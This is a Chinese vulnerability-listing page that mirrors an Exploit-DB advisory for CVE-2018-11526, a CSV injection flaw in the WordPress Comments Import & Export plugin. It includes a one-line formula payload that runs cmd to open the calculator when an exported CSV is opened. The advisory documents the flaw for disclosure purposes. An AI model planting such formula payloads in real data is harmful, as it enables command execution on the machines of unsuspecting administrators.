漏洞概要

漏洞标题:
WordPress Plugin Comments Import & Export < 2.0.4 – CSV Injection

提交时间:
2018-06-25

危害等级:

相关厂商:

漏洞分类:
exp公布

关注度:
共 17 人关注

漏洞详情

EDB-ID: 44940 Author: Bhushan B. Patil Published: 2018-06-25
CVE:
CVE-2018-11526
Type: Webapps Platform: PHP

E-DB Verified:
<a href="javascript:void(0);" data-trigger="focus" data-toggle="popover" data-placement="top" data-content='We make an effort to verify exploits (verifty) in our labs, when possible. A “non verified” exploit (marked by a clock icon clock) simply means we did not have the opportunity to test the exploit internally.’>
Waiting verification

Exploit:

Download Exploit Code Download

/

View Raw

Vulnerable App:
N/A
# Exploit Title: WordPress Plugin Comments Import & Export < 2.0.4 - CSV Injection
# Google Dork: N/A
# Date: 2018-06-24
# Exploit Author: Bhushan B. Patil
# Software Link: https://wordpress.org/plugins/comments-import-export-woocommerce/
# Affected Version: 2.0.4 and before
# Category: Plugins and Extensions
# Tested on: WiN7_x64
# CVE: CVE-2018-11526

# 1. Application Description:
# Comments Import Export Plugin helps you to easily export and import Article and Product Comments in your store.

# 2. Technical Description:
# WordPress Comments Import & Export plugin version 2.0.4 and before are affected by the vulnerability Remote Command Execution
# using CSV Injection. This allows a public user to inject commands as a part of form fields and when a user with
# higher privilege exports the form data in CSV opens the file on their machine, the command is executed.

# 3. Proof Of Concept:
Enter the payload @SUM(1+1)*cmd|' /C calc'!A0 in the form fields and submit.
When high privileged user logs into the application to export form data in CSV and opens the file.
Formula gets executed and calculator will get popped in his machine.

发表评论

电子邮件地址不会被公开。 必填项已用*标注